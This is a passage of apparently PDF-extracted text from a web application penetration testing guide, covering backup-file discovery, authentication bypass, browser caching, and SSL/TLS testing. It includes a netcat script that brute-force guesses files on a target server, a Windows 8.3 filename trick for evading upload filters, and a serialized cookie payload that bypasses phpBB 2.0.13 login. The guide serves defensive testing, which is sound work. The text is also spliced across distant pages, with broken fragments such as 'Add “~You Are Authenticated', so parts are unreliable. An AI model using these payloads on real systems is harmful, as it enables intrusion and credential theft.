is usually associated with server-side Perl support. However, the file extension alone may be deceptive and not fully conclusive. For example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related. See the next section on “web server components” for more on identifying server side technologies and components. How to Test Forced browsing Submit http[s] requests involving different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities). ‘Example: The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are: mysql_connect(“127.0.0.1”, “root”, “”) or die(“Could not connect”); ?> The tester determines the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. • .asa • .inc • .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files • .java: No reason to provide access to Java source files • .txt: Text files • .pdf: PDF documents • .doc, .rtf, .xls, .ppt, ...: Office documents • .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files) The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext. com/ for a more thorough database of extensions. To identify files having a given extensions a mix of techniques can be employed. THese techniques can include Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see Testing: Spidering and googling). See also Testing for Old, Backup and Unreferenced Files which deals with the security issues related to “forgotten” files. File Upload Windows 8.3 legacy file handling can sometimes be used to defeat file upload filters Usage Examples: file.phtml gets processed as PHP code FILE~1.PHT is served, but not processed by the PHP ISAPI handler shell.phPWND can be uploaded SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler Gray Box testing Performing white box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions. If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior. Tools Vulnerability scanners, such as Nessus and Nikto check for the ex- 54 Web Application Penetration Testing istence of well-known web directories. They may allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include: • wget - http://www.gnu.org/software/wget • curl - http://curl.haxx.se • google for “web mirroring tools”. Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004) Summary While most of the files within a web server are directly handled by the server itself, it isn’t uncommon to find unreferenced or forgotten files that can be used to obtain important information about the infrastructure or the credentials. Most common scenarios include the presence of renamed old versions of modified files, inclusion files that are loaded into the language of choice and can be downloaded as source, or even automatic or manual backups in form of compressed archives. Backup files can also be generated automatically by the underlying file system the application is hosted on, a feature usually referred to as “snapshots”. All these files may grant the tester access to inner workings, back doors, administrative interfaces, or even credentials to connect to the administrative interface or the database server. An important source of vulnerability lies in files which have nothing to do with the application, but are created as a consequence of editing application files, or after creating on-the-fly backup copies, or by leaving in the web tree old files or unreferenced files.Performing in-place editing or other administrative actions on production web servers may inadvertently leave backup copies, either generated automatically by the editor while editing files, or by the administrator who is zipping a set of files to create a backup. It is easy to forget such files and this may pose a serious security threat to the application. That happens because backup copies may be generated with file extensions differing from those of the original files. A .tar, .zip or .gz archive that we generate (and forget...) has obviously a different extension, and the same happens with automatic copies created by many editors (for example, emacs generates a backup copy named file~ when editing file). Making a copy by hand may produce the same effect (think of copying file to file.old). The underlying file system the application is on could be making “snapshots” of your application at different points in time without your knowledge, which may also be accessible via the web, posing a similar but different “backup file” style threat to your application. As a result, these activities generate files that are not needed by the application and may be handled differently than the original file by the web server. For example, if we make a copy of login.asp named login.asp.old, we are allowing users to download the source code of login.asp. This is because login.asp.old will be typically served as text or plain, rather than being executed because of its extension. In other words, accessing login.asp causes the execution of the server-side code of login.asp, while accessing login.asp.old causes the content of login.asp.old (which is, again, server-side code) to be plainly returned to the user and displayed in the browser. This may pose security risks, since sensitive information may be revealed. Generally, exposing server side code is a bad idea. Not only are you unnecessarily exposing business logic, but you may be unknowingly revealing application-related information which may help an attacker (path names, data structures, etc.). Not to mention the fact that there are too many scripts with embedded username and password in clear text (which is a careless and very dangerous practice). Other causes of unreferenced files are due to design or configuration choices when they allow diverse kind of application-related files such as data files, configuration files, log files, to be stored in file system directories that can be accessed by the web server. These files have normally no reason to be in a file system space that could be accessed via web, since they should be accessed only at the application level, by the application itself (and not by the casual user browsing around). Threats Old, backup and unreferenced files present various threats to the security of a web application: • Unreferenced files may disclose sensitive information that can facilitate a focused attack against the application; for example include files containing database credentials, configuration files containing references to other hidden content, absolute file paths, etc. • Unreferenced pages may contain powerful functionality that can be used to attack the application; for example an administration page that is not linked from published content but can be accessed by any user who knows where to find it. • Old and backup files may contain vulnerabilities that have been fixed in more recent versions; for example viewdoc.old.jsp may contain a directory traversal vulnerability that has been fixed in viewdoc.jsp but can still be exploited by anyone who finds the old version. • Backup files may disclose the source code for pages designed to execute on the server; for example requesting viewdoc.bak may return the source code for viewdoc.jsp, which can be reviewed for vulnerabilities that may be difficult to find by making blind requests to the executable page. While this threat obviously applies to scripted languages, such as Perl, PHP, ASP, shell scripts, JSP, etc., it is not limited to them, as shown in the example provided in the next bullet. • Backup archives may contain copies of all files within (or even outside) the webroot. This allows an attacker to quickly enumerate the entire application, including unreferenced pages, source code, include files, etc. For example, if you forget a file named myservlets. jar.old file containing (a backup copy of) your servlet implementation classes, you are exposing a lot of sensitive information which is susceptible to decompilation and reverse engineering. • In some cases copying or editing a file does not modify the file extension, but modifies the file name. This happens for example in Windows environments, where file copying operations generate file names prefixed with “Copy of “ or localized versions of this string. Since the file extension is left unchanged, this is not a case where an executable file is returned as plain text by the web server, and therefore not a case of source code disclosure. However, these files too are dangerous because there is a chance that they include obsolete and incorrect logic that, when invoked, could trigger application errors, which might yield valuable information to an attacker, if diagnostic message display is enabled. • Log files may contain sensitive information about the activities of application users, for example sensitive data passed in URL parameters, session IDs, URLs visited (which may disclose additional 55 Web Application Penetration Testing unreferenced content), etc. Other log files (e.g. ftp logs) may contain sensitive information about the maintenance of the application by system administrators. • File system snapshots may contain copies of the code that contain vulnerabilities that have been fixed in more recent versions. For example /.snapshot/monthly.1/view.php may contain a directory traversal vulnerability that has been fixed in /view.php but can still be exploited by anyone who finds the old version. How to Test Black Box Testing Testing for unreferenced files uses both automated and manual techniques, and typically involves a combination of the following: Inference from the naming scheme used for published content Enumerate all of the application’s pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser. asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager. Other clues in published content Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example: Programmers’ comments and commented-out sections of source code may refer to hidden content: JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances: var adminUser=false; : if (adminUser) menu.add (new menuItem (“Maintain users”, “/ admin/useradmin.jsp”)); HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element: Another source of clues about unreferenced directories is the /robots. txt file used to provide instructions to web robots: User-agent: * Disallow: /Admin Disallow: /uploads Disallow: /backup Disallow: /~jbloggs Disallow: /include Blind guessing In its simplest form, this involves running a list of common file names through a request engine in an attempt to guess files and directories that exist on the server. The following netcat wrapper script will read a wordlist from stdin and perform a basic guessing attack: #!/bin/bash server=www.targetapp.com port=80 while read url do echo -ne “$url\t” echo -e “GET /$url HTTP/1.0\nHost: $server\n” | netcat $server $port | head -1 done | tee outputfile Depending upon the server, GET may be replaced with HEAD for faster results. The output file specified can be grepped for “interesting” response codes. The response code 200 (OK) usually indicates that a valid resource has been found (provided the server does not deliver a custom “not found” page using the 200 code). But also look out for 301 (Moved), 302 (Found), 401 (Unauthorized), 403 (Forbidden) and 500 (Internal error), which may also indicate resources or directories that are worthy of further investigation. The basic guessing attack should be run against the webroot, and also against all directories that have been identified through other enumeration techniques. More advanced/effective guessing attacks can be performed as follows: • Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit). • For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, etc.) and use each extension before, after, and instead of, the extension of the actual file name. Note: Windows file copying operations generate file names prefixed with “Copy of “ or localized versions of this string, hence they do not change file extensions. While “Copy of ” files typically do 56 Web Application Penetration Testing not disclose source code when accessed, they might yield valuable information in case they cause errors when invoked. Information obtained through server vulnerabilities and misconfiguration The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing. Numerous vulnerabilities have been found in individual web servers which allow an attacker to enumerate unreferenced content, for example: • Apache ?M=D directory listing vulnerability. • Various IIS script source disclosure vulnerabilities. • IIS WebDAV directory listing vulnerabilities. Use of publicly available information Pages and functionality in Internet-facing web applications that are not referenced from within the application itself may be referenced from other public domain sources. There are various sources of these references: • Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www. example.com. Using search engines in this way has lead to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed by Google, but if they lie in browsable directories the search engine might know about them. • In addition, Google and Yahoo keep cached versions of pages found by their robots. Even if 1998results.asp has been removed from the target server, a version of its output may still be stored by these search engines. The cached version may contain references to, or clues about, additional hidden content that still remains on the server. • Content that is not referenced from within a target application may be linked to by third-party websites. For example, an application which processes online payments on behalf of thirdparty traders may contain a variety of bespoke functionality which can (normally) only be found by following links within the web sites of its customers. File name filter bypass Because blacklist filters are based on regular expressions, one can sometimes take advantage of obscure OS file name expansion features in which work in ways the developer didn’t expect. The tester can sometimes exploit differences in ways that file names are parsed by the application, web server, and underlying OS and it’s file name conventions. Example: Windows 8.3 filename expansion “c:\program files” becomes “C:\PROGRA~1” – Remove incompatible characters – Convert spaces to underscores - Take the first six characters of the basename – Add “~You Are Authenticated
72 Web Application Penetration Testing Session ID Prediction Many web applications manage authentication by using session identifiers (session IDs). Therefore, if session ID generation is predictable, a malicious user could be able to find a valid session ID and gain unauthorized access to the application, impersonating a previously authenticated user. The following figure shows that with a simple SQL injection attack, it is sometimes possible to bypass the authentication form. In the following figure, values inside cookies increase linearly, so it could be easy for an attacker to guess a valid session ID. n the following figure, values inside cookies change only partially, so it’s possible to restrict a brute force attack to the defined fields shown below. SQL Injection (HTML Form Authentication) SQL Injection is a widely known attack technique. This section is not going to describe this technique in detail as there are several sections in this guide that explain injection techniques beyond the scope of this section. Gray Box Testing If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability (e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined attacks against the implementation of the authentication process. In the following example (PHPBB 2.0.13 - Authentication Bypass Vulnerability), at line 5 the unserialize() function parses a user supplied cookie and sets values inside the $row array. At line 10 the user’s MD5 password hash stored inside the back end database is compared to the one supplied. In PHP, a comparison between a string value and a boolean value 1. if ( isset($HTTP_COOKIE_VARS[$cookiename . ‘_sid’]) || 2. { 3. $sessiondata = isset( $HTTP_COOKIE_VARS[$cookiename . ‘_data’] ) ? 4. 5. unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . ‘_data’])) : array(); 6. 7. $sessionmethod = SESSION_METHOD_COOKIE; 8. } 9. 10. if( md5($password) == $row[‘user_password’] && $row[‘user_active’] ) 11. 12. { 13. $autologin = ( isset($HTTP_POST_VARS[‘autologin’]) ) ? TRUE : 0; 14. } (1 - “TRUE”) is always “TRUE”, so by supplying the following string (the important part is “b:1”) to the unserialize() function, it is possible to bypass the authentication control: a:2:{s:11:”autologinid”;b:1;s:6:”userid”;s:1:”2”;} 73 Web Application Penetration Testing Tools • WebScarab • WebGoat • OWASP Zed Attack Proxy (ZAP) References Whitepapers • Mark Roxberry: “PHPBB 2.0.13 vulnerability” • David Endler: “Session ID Brute Force Exploitation and Prediction” - http://www.cgisecurity.com/lib/SessionIDs.pdf Testing for Vulnerable Remember Password (OTG-AUTHN-005) Summary Browsers will sometimes ask a user if they wish to remember the password that they just entered. The browser will then store the password, and automatically enter it whenever the same authentication form is visited. This is a convenience for the user. Additionally some websites will offer custom “remember me” functionality to allow users to persist log ins on a specific client system. Having the browser store passwords is not only a convenience for end-users, but also for an attacker. If an attacker can gain access to the victim’s browser (e.g. through a Cross Site Scripting attack, or through a shared computer), then they can retrieve the stored passwords. It is not uncommon for browsers to store these passwords in an easily retrievable manner, but even if the browser were to store the passwords encrypted and only retrievable through the use of a master password, an attacker could retrieve the password by visiting the target web application’s authentication form, entering the victim’s username, and letting the browser to enter the password. Additionally where custom “remember me” functions are put in place weaknesses in how the token is stored on the client PC (for example using base64 encoded credentials as the token) could expose the users passwords. Since early 2014 most major browsers will override any use of autocomplete=”off” with regards to password forms and as a result previous checks for this are not required and recommendations should not commonly be given for disabling this feature. However this can still apply to things like secondary secrets which may be stored in the browser inadvertently. How to Test • Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. • Examine the hashing mechanism: if it is a common, well-known algorithm, check for its strength; in homegrown hash functions, attempt several usernames to check whether the hash function is easily guessable. • Verify that the credentials are only sent during the log in phase, and not sent together with every request to the application. • Consider other sensitive form fields (e.g. an answer to a secret question that must be entered in a password recovery or account unlock form). Remediation Ensure that no credentials are stored in clear text or are easily retrievable in encoded or encrypted forms in cookies. Testing for Browser cache weakness (OTG-AUTHN-006) Summary In this phase the tester checks that the application correctly instructs the browser to not remember sensitive data. Browsers can store information for purposes of caching and history. Caching is used to improve performance, so that previously displayed information doesn’t need to be downloaded again. History mechanisms are used for user convenience, so the user can see exactly what they saw at the time when the resource was retrieved. If sensitive information is displayed to the user (such as their address, credit card details, Social Security Number, or username), then this information could be stored for purposes of caching or history, and therefore retrievable through examining the browser’s cache or by simply pressing the browser’s “Back” button. How to Test Browser History Technically, the “Back” button is a history and not a cache (see http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.13). The cache and the history are two different entities. However, they share the same weakness of presenting previously displayed sensitive information. The first and simplest test consists of entering sensitive information into the application and logging out. Then the tester clicks the “Back” button of the browser to check whether previously displayed sensitive information can be accessed whilst unauthenticated. If by pressing the “Back” button the tester can access previous pages but not access new ones, then it is not an authentication issue, but a browser history issue. If these pages contain sensitive data, it means that the application did not forbid the browser from storing it. Authentication does not necessarily need to be involved in the testing. For example, when a user enters their email address in order to sign up to a newsletter, this information could be retrievable if not properly handled. The “Back” button can be stopped from showing sensitive data. This can be done by: • Delivering the page over HTTPS. • Setting Cache-Control: must-re-validate Browser Cache Here testers check that the application does not leak any sensitive data into the browser cache. In order to do that, they can use a proxy (such as WebScarab) and search through the server responses that belong to the session, checking that for every page that contains sensitive information the server instructed the browser not to cache any data. Such a directive can be issued in the HTTP response headers: 74 Web Application Penetration Testing • Cache-Control: no-cache, no-store • Expires: 0 • Pragma: no-cache These directives are generally robust, although additional flags may be necessary for the Cache-Control header in order to better prevent persistently linked files on the filesystem. These include: • Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0 Testing for Weak password policy (OTG-AUTHN-007) Summary The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456, password and qwerty. HTTP/1.1: Cache-Control: no-cache Test objectives Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords. HTTP/1.0: Pragma: no-cache Expires:http://
401 Authorization Required
Invalid login credentials! Testing for Weak SSL/TLS Ciphers/Protocols/Keys vulnerabilities The large number of available cipher suites and quick progress in cryptanalysis makes testing an SSL server a non-trivial task. At the time of writing these criteria are widely recognized as minimum checklist: • Weak ciphers must not be used (e.g. less than 128 bits [10]; no NULL ciphers suite, due to no encryption used; no Anonymous Diffie-Hellmann, due to not provides authentication). • Weak protocols must be disabled (e.g. SSLv2 must be disabled, due to known weaknesses in protocol design [11]). • Renegotiation must be properly configured (e.g. Insecure Renegotiation must be disabled, due to MiTM attacks [12] and Client-initiated Renegotiation must be disabled, due to Denial of Service vulnerability [13]). • No Export (EXP) level cipher suites, due to can be easly broken [10]. • X.509 certificates key length must be strong (e.g. if RSA or DSA is used the key must be at least 1024 bits). • X.509 certificates must be signed only with secure hashing algoritms (e.g. not signed using MD5 hash, due to known collision attacks on this hash). • Keys must be generated with proper entropy (e.g, Weak Key Generated with Debian) [14]. A more complete checklist includes: • Secure Renegotiation should be enabled. • MD5 should not be used, due to known collision attacks. [35] • RC4 should not be used, due to crypto-analytical attacks [15]. • Server should be protected from BEAST Attack [16]. • Server should be protected from CRIME attack, TLS compres sion must be disabled [17]. • Server should support Forward Secrecy [18]. The following standards can be used as reference while assessing SSL servers: • PCI-DSS v2.0 in point 4.1 requires compliant parties to use “strong cryptography” without precisely defining key lengths and algorithms. Common interpretation, partially based on previous versions of the standard, is that at least 128 bit key cipher, no export strength algorithms and no SSLv2 should be used [19]. • Qualys SSL Labs Server Rating Guide [14], Depoloyment best practice [10] and SSL Threat Model [20] has been proposed to standardize SSL server assessment and configuration. But is less updated than the SSL Server tool [21]. • OWASP has a lot of resources about SSL/TLS Security [22], [23], [24], [25]. [26]. Some tools and scanners both free (e.g. SSLAudit [28] or SSLScan [29]) and commercial (e.g. Tenable Nessus [27]), can be used to assess SSL/TLS vulnerabilities. But due to evolution of these vulnerabilities a good way to test is to check them manually with openssl [30] or use the tool’s output as an input for manual evaluation using the references. Sometimes the SSL/TLS enabled service is not directly accessible and the tester can access it only via a HTTP proxy using CONNECT method [36]. Most of the tools will try to connect to desired tcp port to start SSL/TLS handshake. This will not work since desired port is accessible only via HTTP proxy. The tester can easily circumvent this by using relaying software such as socat [37]. Example 2. SSL service recognition via nmap The first step is to identify ports which have SSL/TLS wrapped services. Typically tcp ports with SSL for web and mail services are but not limited to - 443 (https), 465 (ssmtp), 585 (imap4-ssl), 993 (imaps), 995 (ssl-pop). In this example we search for SSL services using nmap with “-sV” option, used to identify services and it is also able to identify SSL services [31]. Other options are for this particular example and must be customized. Often in a Web Application Penetration Test scope is limited to port 80 and 443. $ nmap -sV --reason -PN -n --top-ports 100 www.example. com Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 00:00 CEST Nmap scan report for www.example.com (127.0.0.1) Host is up, received user-set (0.20s latency). Not shown: 89 filtered ports Reason: 89 no-responses PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack Pure-FTPd 22/tcp open ssh syn-ack OpenSSH 5.3 (protocol 2.0) 25/tcp open smtp syn-ack Exim smtpd 4.80 26/tcp open smtp syn-ack Exim smtpd 4.80 80/tcp open http syn-ack 110/tcp open pop3 syn-ack Dovecot pop3d 143/tcp open imap syn-ack Dovecot imapd 443/tcp open ssl/http syn-ack Apache 465/tcp open ssl/smtp syn-ack Exim smtpd 4.80 993/tcp open ssl/imap syn-ack Dovecot imapd 995/tcp open ssl/pop3 syn-ack Dovecot pop3d Service Info: Hosts: example.com Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 131.38 seconds 161 Web Application Penetration Testing Example 3. Checking for Certificate information, Weak Ciphers and SSLv2 via nmap Nmap has two scripts for checking Certificate information, Weak Ciphers and SSLv2 [31]. $ nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995 www.example.com Starting Nmap 6.25 ( http://nmap.org ) at 2013-01-01 00:00 CEST Nmap scan report for www.example.com (127.0.0.1) Host is up (0.090s latency). rDNS record for 127.0.0.1: www.example.com PORT STATE SERVICE 443/tcp open https | ssl-cert: Subject: commonName=www.example.org | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 1024 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 465/tcp open smtps | ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 993/tcp open imaps | ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong 995/tcp open pop3s | ssl-cert: Subject: commonName=*.exapmple.com | Issuer: commonName=******* | Public Key type: rsa | Public Key bits: 2048 | Not valid before: 2010-01-23T00:00:00+00:00 | Not valid after: 2020-02-28T23:59:59+00:00 | MD5: ******* |_SHA-1: ******* | ssl-enum-ciphers: | SSLv3: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL | TLSv1.0: | ciphers: | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong | TLS_RSA_WITH_RC4_128_SHA - strong | compressors: | NULL |_ least strength: strong Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds 162 Web Application Penetration Testing Example 4 Checking for Client-initiated Renegotiation and Secure Renegotiation via openssl (manually) Openssl [30] can be used for testing manually SSL/TLS. In this example the tester tries to initiate a renegotiation by client [m] connecting to server with openssl. The tester then writes the fist line of an HTTP request and types “R” in a new line. He then waits for renegotiaion and completion of the HTTP request and checks if secure renegotiaion is supported by looking at the server output. Using manual requests it is also possible to see if Compression is enabled for TLS and to check for CRIME [13], for ciphers and for other vulnerabilities. $ openssl s_client -connect www2.example.com:443 CONNECTED(00000003) depth=2 ****** verify error:num=20:unable to get local issuer certificate verify return:0 --Certificate chain 0 s:****** i:****** 1 s:****** i:****** 2 s:****** i:****** --Server certificate -----BEGIN CERTIFICATE----****** -----END CERTIFICATE----subject=****** issuer=****** --No client certificate CA names sent --SSL handshake has read 3558 bytes and written 640 bytes --New, TLSv1/SSLv3, Cipher is DES-CBC3-SHA Server public key is 2048 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1 Cipher : DES-CBC3-SHA Session-ID: ****** Session-ID-ctx: Master-Key: ****** Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None Start Time: ****** Timeout : 300 (sec) Verify return code: 20 (unable to get local issuer certificate) --- Now the tester can write the first line of an HTTP request and then R in a new line. HEAD / HTTP/1.1 R Server is renegotiating RENEGOTIATING depth=2 C****** verify error:num=20:unable to get local issuer certificate verify return:0 And the tester can complete our request, checking for response. Even if the HEAD is not permitted, Client-intiated renegotiaion is permitted. HEAD / HTTP/1.1 HTTP/1.1 403 Forbidden ( The server denies the specified Uniform Resource Locator (URL). Contact the server administrator. ) Connection: close Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 1792 read:errno=0 Example 5. Testing supported Cipher Suites, BEAST and CRIME attacks via TestSSLServer TestSSLServer [32] is a script which permits the tester to check the cipher suite and also for BEAST and CRIME attacks. BEAST (Browser Exploit Against SSL/TLS) exploits a vulnerability of CBC in TLS 1.0. CRIME (Compression Ratio Info-leak Made Easy) exploits a vulnerability of TLS Compression, that should be disabled. What is interesting is that the first fix for BEAST was the use of RC4, but this is now discouraged due to a crypto-analytical attack to RC4 [15]. An online tool to check for these attacks is SSL Labs, but can be used only for internet facing servers. Also consider that target data will be stored on SSL Labs server and also will result some connection from SSL Labs server [21]. $ java -jar TestSSLServer.jar www3.example.com 443 Supported versions: SSLv3 TLSv1.0 TLSv1.1 TLSv1.2 Deflate compression: no Supported cipher suites (ORDER IS NOT SIGNIFICANT): SSLv3 RSA_WITH_RC4_128_SHA RSA_WITH_3DES_EDE_CBC_SHA DHE_RSA_WITH_3DES_EDE_CBC_SHA RSA_WITH_AES_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA 163 Web Application Penetration Testing RSA_WITH_AES_256_CBC_SHA DHE_RSA_WITH_AES_256_CBC_SHA RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_CAMELLIA_128_CBC_SHA RSA_WITH_CAMELLIA_256_CBC_SHA DHE_RSA_WITH_CAMELLIA_256_CBC_SHA TLS_RSA_WITH_SEED_CBC_SHA TLS_DHE_RSA_WITH_SEED_CBC_SHA (TLSv1.0: idem) (TLSv1.1: idem) TLSv1.2 RSA_WITH_RC4_128_SHA RSA_WITH_3DES_EDE_CBC_SHA DHE_RSA_WITH_3DES_EDE_CBC_SHA RSA_WITH_AES_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA RSA_WITH_AES_256_CBC_SHA DHE_RSA_WITH_AES_256_CBC_SHA RSA_WITH_AES_128_CBC_SHA256 RSA_WITH_AES_256_CBC_SHA256 RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_CAMELLIA_128_CBC_SHA DHE_RSA_WITH_AES_128_CBC_SHA256 DHE_RSA_WITH_AES_256_CBC_SHA256 RSA_WITH_CAMELLIA_256_CBC_SHA DHE_RSA_WITH_CAMELLIA_256_CBC_SHA TLS_RSA_WITH_SEED_CBC_SHA TLS_DHE_RSA_WITH_SEED_CBC_SHA TLS_RSA_WITH_AES_128_GCM_SHA256 TLS_RSA_WITH_AES_256_GCM_SHA384 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 ---------------------Server certificate(s): ****** ---------------------Minimal encryption strength: strong encryption (96-bit or more) Achievable encryption strength: strong encryption (96-bit or more) BEAST status: vulnerable CRIME status: protected Example 6. Testing SSL/TLS vulnerabilities with sslyze Sslyze [33] is a python script which permits mass scanning and XML output. The following is an example of a regular scan. It is one of the most complete and versatile tools for SSL/TLS testing ./sslyze.py --regular example.com:443 REGISTERING AVAILABLE PLUGINS ----------------------------- PluginHSTS PluginSessionRenegotiation PluginCertInfo PluginSessionResumption PluginOpenSSLCipherSuites PluginCompression CHECKING HOST(S) AVAILABILITY ----------------------------example.com:443 => 127.0.0.1:443 SCAN RESULTS FOR EXAMPLE.COM:443 - 127.0.0.1:443 --------------------------------------------------* Compression : Compression Support: Disabled * Session Renegotiation : Client-initiated Renegotiations: Rejected Secure Renegotiation: Supported * Certificate : Validation w/ Mozilla’s CA Store: Certificate is NOT Trusted: unable to get local issuer certificate Hostname Validation: MISMATCH SHA1 Fingerprint: ****** Common Name: Issuer: Serial Number: Not Before: Not After: www.example.com ****** **** Sep 26 00:00:00 2010 GMT Sep 26 23:59:59 2020 GMT Signature Algorithm: sha1WithRSAEncryption Key Size: 1024 bit X509v3 Subject Alternative Name: {‘othername’: [‘401 Authorization Required h1> Invalid login credentials! Example 2: Form-Based Authentication Performed over HTTP Another typical example is authentication forms which transmit user authentication credentials over HTTP. In the example below one can see HTTP being used in the “action” attribute of the form. It is also possible to see this issue by examining the HTTP traffic with an interception proxy.
